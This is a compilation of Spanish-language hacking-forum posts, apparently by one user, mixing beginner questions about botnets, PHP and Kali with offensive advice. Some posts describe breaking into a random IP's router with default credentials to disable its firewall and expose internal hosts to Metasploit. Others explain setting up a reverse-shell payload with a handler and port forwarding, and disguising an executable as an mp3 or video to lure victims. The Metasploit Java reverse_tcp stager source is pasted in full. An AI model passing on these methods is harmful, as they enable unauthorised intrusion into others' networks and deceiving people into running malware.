Os doy las gracias a todos por vuestro despliegue de conocimientos y sabiduria, me ha quedado claro el tema Bot.

Por regla general se conectan a esa página Web entrecomillas en donde a través de su panel de control, se controla y manda hacer tareas concretas.

Una duda más que tengo ¿Si estuviera infectado por un bot, podría ver las conexiones que hace con el cliente, o sólo se conecta cuando se le mandan una serie de ordenes?

Lo digo por que hace  un poco tiempo instalé un firewall muy bueno por cierto y ahora estoy viendo que lo estan compartiendo por varios Foros ese Firewall.

Como trabajo en virtuales, pude ver como antes de cargar el sistema operativo, relizaba conexiones con una página Web en un espacio de tiempo corto y no era akamay ni microsoft ni nada de esto era una página web a la que accedi y había un chat para usuarios de esa web.

Después de lo que me habéis enseñado creo que ese firewall iba infectado con un bot sin lugar a dudas, y lo malo de esto  es que está corriendo por varios Foro amigos!

No es obsesión lo que siento pero si necesito  estar protegido, gracias comunidad underc0de por vuestra ayuda.

Hola compañeros, podría alguien explicarme o mostrarme algún tutorial como funciona una Botnet.He buscado por internet y siempre he recibido los mismos resultados configuraciones de Botnet.

Que diferencias existen entre un Rat y una Botnet?

Digamoslo asi lo que recibe la señal del server.exe es la página Web Botnet y desde ahi se controlan los remotos?.

Cómo se infecta con un Bot? al estilo tradicional con programas infectados, infectando a través de url, como?.

Cómo realiza el spread?, perdonarme es solo por pura información nada más me gusta informarme de todo y aprender.

No logró comprender su funcionamiento por más que lo he buscado, Gracias comunidad por vuestro apoyo y ayuda.

Hola amigo si bien te he entendido el problema es que tu web no es visible externamente.

Si es lo que preguntas, para que tu página sea visible desde el exterior, debes redireccionar a tu ip local:80, asi cuando pongas en el navegador tu ip externa podrás visualizarla.

Haz un netstat -antp para comprobar que apache lo tienes en  escucha, espero haberte ayudado.Otra cosa configura bien tu apache en el archivo conf para que no admita login, no vaya a ser que te hagan  alguna  travesura, los traviesos.

Gracias blackdrake, tenéis toda la razón del mundo,he instalado Xampp y voy hacer mis práticas en local antes de lanzarme al vacío.

Tambié he visto que los datos comprometedores los puedo tener en otro archivo e instanciarlos en el php en el momento de ejecución.

Un saludo amigos.

Hola compañeros, la verdad es que os agradezco eternamente vuestra colaboración.Estoy hecho un lío, soy la típica persona que llega tarde a todas las fiestas, pero cuando llego aprendo muy rápido.

Actualmente me encuento en una situación que no sé el camino que tomar, mi situación es que se crear páginas web aceptables, y estoy investigando sobre como interaccionar con la base de datos.

El temor que tengo es a los Defacers, y veo que hay unos grandísimos profesionales, he hecho un curso básico de Java Web, y creo que es el camino que voy a tomar,ya que me manejo aceptablemente con java.

Creo que el entorno java web va a ser más seguro, o eso creo java dispone de los drives para interactuar con la BD, y lo hace llamando un servlet el cual recoge los datos, los transfiere a un javabean y este los transfiere a la base de datos.Creo que es más seguro este entorno de trabajo con la BD.

Con respecto a tu respuesta, la cual agradezco "php se ejecuta en el server, no pueden ver el contenido, hace la prueba vos mismo.", es cierto lo que  dices y lo entiendo, pero,¿ como es posible que el otro dia me descargara un .php utilizando el comando wget y pude ver su código?

Nuevamente, gracias por vuestro tiempo compañeros.

Hola comunidad, sé que mis preguntas son tontas, pero estoy empty al respecto:
Mi primera pregunta es tengo un form que introduce datos varios de usuarios, en el action pongo parabd.php,
entonces en este php para comunicarse con mi bd tiene como datos:
El nombre de la Bd

User y password para interaccionar con la BD.
Si un usuario lee el código de mi web, puede ver el action="parabd.php" , si este usuario se hace con un wget consigue  este php, entonces tiene los datos de BD, user y password.

Como hago para que no se vean estos datos o como lo hacéis vosotros , por favor darme un poco de luz, estoy empezando en esto, y me gustaría estar protegido,gracias.

Sino estoy equivocado, creo que leí un Tutorial del maestro Sanko, en el que realizaba una compilación de un exe con python desde linux.

Si esta por estos albores Sanko y quiere compartir nuevamente su sabiduría será bienvenida.

Estoy de acuerdo contigo, sé que para utilizar la clase httpClient en java debo utilizar las librerias|Apis de apache http component.

Pero la duda la tengo a la hora de si quiero hacer una desktop app, para escanear malware en fuckingscan por ejemplo, entonces es cuando veo que se usa esa terminología, por ejemplo he utilizado las apis de tal para hacer la Tool esto es lo que no comprendo, que quieren decir.

Pensé en hacerme una Tool de scan, se que tengo que interaccionar con el form del site, desconozco como saltarme el adf/fly de fuckingscan y desconozco como utilizar esas Apis

Hola amigos de Underc0de, tengo una duda sobre el termino que se usa a veces, por ejemplo, he visto que cuando se hace un programa tipo scan de malware.
Veo que se usa el termino "utiliza las apis de scan4you" o tal Api, entonces esta es mi duda, como puedo saber como utilizarlas o como conseguirlas?

Hola a todos, en primer lugar no puedo ponerme ni a la altura de sniffer ni de magoastral, ya que, son unos maestros y yo soy un simple aprendiz, siempre me encuentro vacío,aunque cada vez sepa más , siempre me quedo con la sensación de que soy un ignorante.

Ante mi preámbulo, voy a contestarte a tu pregunta con un ejemplo de mi diminuta experiencia:

Suponte que haces un nmap a una ip random.

Supón que el resultado de nmap te devuelve el puerto 80 abierto.

Supongo que dices vaya una m............a sólo tiene el 80 abierto.

Entonces ahora viene  la Tela

Supón que pones en la barra de direcciones de tu navegadro ip y puerto asi You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:80

Supón que se te abre la configuración del router pidiendo login password

Supón que  tiene las contraseñas por default "admin|| admin12345"

Supón que has entrado a la configuración del router,jajajajajajaja se está poniendo cachonda la cosa no?,jejeje

Supón que entramos y vemos las ip internas de esa red ejemplo:192.168.0.100 pc juanito, 192.168.0.101 pc Antrax,jajajaja.

Supón que ahora cojo y entro al apartado de la configuración del router y redirecciono a esas ip internas y le desconecto el firewall a ese router, y le pongo a esas ip internas los puertos abiertos desde el 0 al 59999,jejejeje se está poniendo la cosa caliente verdad..

Supón que ahora vuelvo a hacer un scan con nmap, y me devuelve en uno de sus varios resultados nuevos el puerto 445 abierto de juanito y el 3389 de Antrax.

Pues ya no supongas más y empieza a utilizar las neuronas, esto es una modesta y pequeña historia vivida y experimentada por mí, y con la cual te he explicado y respondido a tu pregunta, deja de suponer y empieza a trabajar la idea.

          tú>>>>>>>>>>>>>>>>router puertos cerrados>>>>nmap recibe nada más que puerto 80 abierto
      ahora sí nmap recibe<<<<<<router puertos abiertos y redireccionados y sin firewall.
      ahora sí puedes hacer un ataque con metasploit, eso si,habiendo algo que explotar por supuesto.

Saludos hermanos
         

Hi c4P0 genera el payload con tu ip externa como te ha dicho snifer,pon el puerto que quiere, pon el multi/handler a trabajar.
Haz un netstat -antp, veràs si tienes el puerto en escucha, y entra a tu router y redirecciona a tu ip local y puerto, supongo que sabrás cual es tu ip local.
Es sencillo al ejecutar el remoto el msf.exe, realizará una conexión con tu ip externa, osea con tu router, y este a su vez realizará una conexión con tu ip local que la tienes esperando con ansias de  conexión ajena.
Si no redireccionas en el router es evidente que es como estrellar la conexión contra un muro , espero haberte ayudado c4P0.

Y a parte de lo que te ha dicho el hermano Snifer, tienes que hacer un redireccionamiento en el router hacia tu ip local y puerto, sino lo haces es lo mismo que un golpe frontal contra un muro.

Me explico :
>>>>>>>>>>>>>>>>router>>>>>>>>>iplocal
                            192.168.0.100:4444

Hola a todos y cada uno que habeis participado en este post, lo primero de todo el poder mandar un .exe que termine en una extensión amigable, es decir jpeg, avi,...etc, sería el sueño de todos los de este Foro y de toda la red de redes.
Un exe es un exe y así está escrito en los Mandamientos  de windows, le demos las vueltas que le demos es asi.Ahora bien bajo mis experiencias en el pasado, cuando tenía las mismas incertidubres que tú, la única forma más cercana a la perfección las obtuve de dos formas, las cuales las voy a describir.

[1] Renombrando mi .exe a Julio_Iglesias.mp3.pif <<<<<Si haceis las pruebas vereis que desaparece la extensión .pif y solo queda Julio_Iglesias.mp3, ahora viene  el dilema, Joder Hu3c0 pero es que tiene el maldito icono de los pif...! pues sí, pero es lo más cercano a lo que buscamos.

[2] Bueno aqui viene otra forma en como lo hacia, cambiaba el icono del ejecutable por un jpg, avi , o el que me diera la gana, y renombraba asi el exe, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, cabe decir que  como icono ponia un reclamo extraordinario para inducir   a ver el video de marta.

Pues bien ..! ya termino, os digo que no os vendan la bicicleta, las matemáticas estan escritas un exe será un exe lo diga quien lo diga, dandole la vuelta  con extensions spoofer o lo que hagamos, es como la Ley de la Gravedad de Windows.

Si alguien tiene que corregirme algo que lo haga pero es la triste realidad, ahora tambien hay ingenieria social muy bien currada para colar los exe, pero repito la gravedad es la gravedad.

Saludos comunidad.

Efectivamente Sniffer, es lo que estoy sospechando desde hace como un año y medio, como bien he dicho mi portatil acepta arquitecturas x64, tengo varias distros del Backtrack R3 tanto en x84 como x64, cuando intenté de instalarme hace año y medio el Backtrack 5 x64, cuando iniciaba la instalación aproximadamente a mitad de recorrido, me marcaba error.

Error por imagen iso ,error por la lente de mi cdrom, o error por disco duro, despues en todas las distros que he intentado instalar bien sea x84 o x64 de kali ,bugtraq o la que sea me manda en la mayoria de los casos error de instalación.

Creo que el problema radica en el disco duro.

Gracias por vuestro tiempo.

Cuando quemo una iso lo hago con k3b es un software gratuito para nuestras distro, k3b tiene una opción para la comprobación del hash, he descargado como 4 veces kali en su última versión tiene como unos 3.1GB.

Con repecto a instalar kali sin poner mi red, es precisamente lo que he hecho para poder seguir con los pasos posteriores, y de hecho se instala.

Pero al dar en el icono network, no me deja desplazarme por ningún sitio, no me detecta las tarjetas de red, doy click en el boto aplication y se queda congelado, es extraño.

En todos los videotutoriales que he visto en ninguno pide la opción de configuracion de las network, ni la configuración DHCP, que por cierto se la metí manualmente, ya que conozco la configuración que da el router.

Ya he desistido, y sólo me queda instalarlo en virtual, ya que en virtual si puedo trabajarlo,.

Tambien he probado a instalar Bugtraq  y lo mismo no se instala correctamente advirtiendome de que hay un problema en el disco Duro.

Creo que sólo me queda la resignación, y pobrar las distros en virtual..

Muchas gracias por tu respuesta hermano

Hi underc0de, vengo con esta pregunta y es que me trae de cabeza, he intentado instalar la distro de kali de su pagina oficial.
El problema lo tengo por dos vertientes, la primera es.
Cuando llego a la parte que me detecta las interfaces de red, cuando le meto el essid , la password de mi red wifi, etc, entra en un bucle infinito, vuelve otra vez a hacerme las mismas preguntas sobre essid , passwd wifi.
Si apreto ESC, entro al menu de instalación y finaliza instalando kali  en el  disco.
Pero se queda congelado no me deja entrar a aplicaciones en networks no me detecta nada, no me deja abrir bash, no sé ya lo que hacer..
Sé que antrax tiene un Blog y estuve buscando info pero como os digo no he podido instalarlo.
Tambien creo que tengo problemas en el disco duro, existe algo para poder repararlo ya que tiene una arquitectura x64 pero siempre que descargo iso x64 me dice fallo en el disco duro.

Gracias de antemano

Me ha encantado el Tutorial, jefe, es mi lenguaje preferido, y veo lo simple que es crackear una aplicación de Java.

Ya le he puesto una chincheta a este post in my brain, y te pido disculpas porque no habia visto el mp, que me mandaste, gracias hermano.


Un abrazo marik, en el buen sentido de la palabra,jajaja

Espero  que  sea esto lo que buscas este es el  payload java/reverse_tcp está en rb

Citar##
# $Id: reverse_tcp.rb 13213 2011-07-18 23:15:06Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

   include Msf::Payload::Stager
   include Msf::Payload::Java

   def initialize(info = {})
      super(merge_info(info,
         'Name'          => 'Java Reverse TCP stager',
         'Version'       => '$Revision: 13213 $',
         'Description'   => 'Connect back stager',
         'Author'        => [
               'mihi',  # all the hard work
               'egypt', # msf integration
            ],
         'License'       => MSF_LICENSE,
         'Platform'      => 'java',
         'Arch'          => ARCH_JAVA,
         'Handler'       => Msf::Handler::ReverseTcp,
         'Convention'    => 'javasocket',
         'Stager'        => {'Payload' => ""}
         ))

      register_advanced_options(
         [
            Msf::OptInt.new('Spawn', [ true, "Number of subprocesses to spawn", 2 ])
         ], self.class
      )

      @class_files = [ ]
   end

   def config
      spawn = datastore["Spawn"] || 2
      c =  ""
      c << "Spawn=#{spawn}\n"
      c << "LHOST=#{datastore["LHOST"]}\n" if datastore["LHOST"]
      c << "LPORT=#{datastore["LPORT"]}\n" if datastore["LPORT"]
      
      c
   end

end

Si no sabes hacer un envenenamiento arp, haz lo que te ha dicho Cloud swx, localiza la puerta predeterminada de enlace, entra a la web del router con user y pass, y hay filtras las mac.
Porque lo del envenenamiento arp sólo es miestras que estes dando por el c.....o con arpspoff o con ettercap, una vez pares vuelven a conectarse.

Podeis cerrar este Thread, ya que he encontrado la solución, gracias de todas formas.